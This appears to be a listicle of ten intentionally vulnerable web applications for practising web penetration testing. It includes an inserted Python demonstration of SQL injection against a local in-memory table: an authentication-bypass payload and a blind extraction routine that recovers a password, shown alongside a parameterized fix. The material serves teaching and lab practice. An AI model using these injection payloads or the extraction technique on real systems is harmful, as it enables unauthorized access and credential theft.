10 vulnerable web applications to Hack
DVWA (Damn Vulnerable Web
Application) - this vulnerable PHP/MySQL web application is one of the best-known
applications for testing your skills in web penetration testing and your
knowledge of manual SQL injection, XSS, blind SQL injection, and similar
flaws. DVWA is developed by Ryan Dewhurst a.k.a ethicalhack3r and is
part of the RandomStorm OpenSource project.
Link: http://www.dvwa.co.uk
Mutillidae - is a free and open
source web application for website penetration testing and hacking, developed
by Adrian “Irongeek” Crenshaw and Jeremy “webpwnized” Druin. It is
designed to be exploitable and vulnerable and is ideal for practicing your Web Fu
skills such as SQL injection, cross-site scripting, HTML injection, JavaScript
injection, clickjacking, local file inclusion, authentication bypass methods,
remote code execution and many more, based on the OWASP (Open Web Application
Security Project) Top 10 web vulnerabilities.
SQLol - is a configurable SQL
injection testbed which allows you to exploit SQL injection (SQLi)
flaws, but furthermore gives you a large amount of control
over how the flaw manifests (where the injection lands in the query and what
the application reveals). This application was released at
Austin Hackers Association meeting 0x3f by Daniel “unicornFurnace” Crowley
of Trustwave Holdings, Inc. – SpiderLabs.
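The flaw class that DVWA's and SQLol's entries above describe, shown as an added example that is not code from either project: a login built by string concatenation against a constructed in-memory SQLite table, its parameterized counterpart, and a boolean-based blind extraction that recovers a password using only the login's success or failure as an oracle. The table contents, the user names and the passwords are assumptions made up for this illustration.

```python
import sqlite3

# Constructed lab data (not from DVWA or SQLol): two accounts, plaintext
# passwords so the blind extraction has something simple to recover.
USERS = [("admin", "s3cret"), ("alice", "wonderland")]


def make_db():
    """Build an in-memory SQLite database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The flaw: user input is spliced into SQL text, so quotes and
    comment markers in the input change the query's structure."""
    sql = (
        "SELECT id FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """The fix: bound parameters are sent as data, never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def blind_extract_password(conn, username, charset, max_len=16):
    """Boolean-based blind SQL injection: the only signal is whether the
    login succeeds. Each probe asks 'is character N of the password X?'
    and the trailing '-- ' comments out the real password check."""
    extracted = ""
    for pos in range(1, max_len + 1):  # SQLite substr() is 1-indexed
        matched = None
        for ch in charset:
            payload = username + "' AND substr(password," + str(pos) + ",1)='" + ch + "' -- "
            if login_vulnerable(conn, payload, "x"):
                matched = ch
                break
        if matched is None:  # no character matched: end of the password
            break
        extracted += matched
    return extracted


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR 1=1 -- "
    print("vulnerable login, bypass payload:", login_vulnerable(db, bypass, "x"))
    print("parameterized login, same payload:", login_safe(db, bypass, "x"))
    print("blind extraction of admin password:",
          blind_extract_password(db, "admin", "abcdefghijklmnopqrstuvwxyz0123456789"))
```

The bypass payload works because `-- ` turns the rest of the query into a comment; a payload such as `' OR '1'='1` would not, since AND binds tighter than OR and the password check still applies. Labs like SQLol are useful precisely because they let you vary where in the query the input lands, which changes which payload shape is needed.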
Hackxor - a web application hacking
game developed by albino. Players must locate and exploit
vulnerabilities to progress through the story, in which you play a blackhat
hacker hired to track down another hacker by any means possible. It contains
scripts that are vulnerable to cross-site scripting (XSS), cross-site request
forgery (CSRF), SQL injection (SQLi), remote command
injection, and many more. It runs on Fedora 14.
The BodgeIt Store - is an open source and
vulnerable web application which is currently aimed at people who are new to
web penetration testing. It is easy to install and requires Java
and a servlet engine, e.g. Tomcat. It includes vulnerabilities like cross-site
scripting, SQL injection, hidden (but unprotected) content,
debug code, cross-site request forgery, insecure object references,
and application logic vulnerabilities.
Exploit KB /
exploit.co.il Vulnerable Web App - is one of the best-known
vulnerable web apps, designed as a learning platform to test various SQL
injection techniques; it is a functional web site with a content management
system based on FCKeditor. This web application is also included in the BackTrack Linux
5r2-PenTesting Edition lab.
WackoPicko - is a vulnerable web
application written by Adam Doupé. It contains known and common vulnerabilities
for you to sharpen your web penetration skills and knowledge: XSS
vulnerabilities, SQL injections, command-line injection, session ID
vulnerabilities, file inclusion, parameter manipulation, reflected XSS behind
JavaScript, a logic flaw, reflected XSS behind a Flash form,
and weak usernames or passwords. It was first used for the paper Why Johnny Can’t Pentest:
An Analysis of Black-box Web Vulnerability Scanners.
WebGoat - is an OWASP project and
a deliberately insecure J2EE web application designed to teach web
application security lessons and concepts. What’s cool about this web
application is that it lets users demonstrate their understanding of a security
issue by exploiting a real vulnerability in the application in each lesson.
OWASP Hackademic Challenges
Project - is another OWASP
project that helps you test your knowledge of web application security. You can
use it to attack web applications in a realistic but also controllable and safe
environment. Currently, there are 10 web application security scenarios
available for you to hack.
XSSeducation – is a set of cross-site
scripting attack challenges, ranging from people just learning about XSS to people
who just want a good place to practice their already impressive skills. Various
realistic challenges have been included for practice; it is still under
development by AJ00200 but can already be downloaded.